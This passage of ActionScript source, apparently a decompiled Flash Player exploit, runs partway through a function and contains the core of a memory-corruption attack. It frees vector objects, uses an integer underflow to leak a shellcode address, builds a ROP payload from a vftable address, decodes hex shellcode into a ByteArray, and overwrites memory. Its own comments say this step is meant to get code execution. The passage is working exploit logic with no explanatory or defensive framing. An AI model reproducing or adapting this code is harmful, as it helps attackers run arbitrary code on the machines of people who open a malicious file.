vector_byte_arrays[length_vector_byte_arrays] = null;
i = 0;
while (i < vector_objects.length)
{
vector_objects[i++] = null;
};
return (false);
};
i = 0;
while (i < vector_objects.length)
{
if (i != vector_objects_entry_idx)
{
vector_objects[i] = null;
};
i++;
};
// Use underflow to leak shellcode address
if (((!((li16((_local_6 + 1)) == 114))) && (((shellcode_address = li32((_local_6 - 0x0200)) ) == 305419896))))
{
};
shellcode_address = (shellcode_address + 0x1300);
var rop_payload:ByteArray = makePayload(vftable_addr, shellcode_address);
if (rop_payload == null)
{
return (true);
};
var j:uint;
var shellcode_length:uint = shellcode.length;
var shellcode_byte_array:ByteArray = new ByteArray();
shellcode_byte_array.endian = "littleEndian";
while (j < shellcode_length)
{
shellcode_byte = (shellcode.charAt(j) + shellcode.charAt((j + 1)));
shellcode_byte_array.writeByte(parseInt(shellcode_byte, 16));
j = (j + 2);
};
vector_byte_arrays[length_vector_byte_arrays].position = 0;
vector_byte_arrays[length_vector_byte_arrays].endian = "littleEndian";
vector_byte_arrays[length_vector_byte_arrays].writeBytes(rop_payload);
vector_byte_arrays[length_vector_byte_arrays].writeBytes(shellcode_byte_array);
// Use underflow to overwrite and get code execution
if (li16((_local_6 + 1)) != 114)
{
si32((shellcode_address + 1), (_local_6 - 244));
};
vector_objects[vector_objects_entry_idx][1][0];
return (true);
}
}
}//package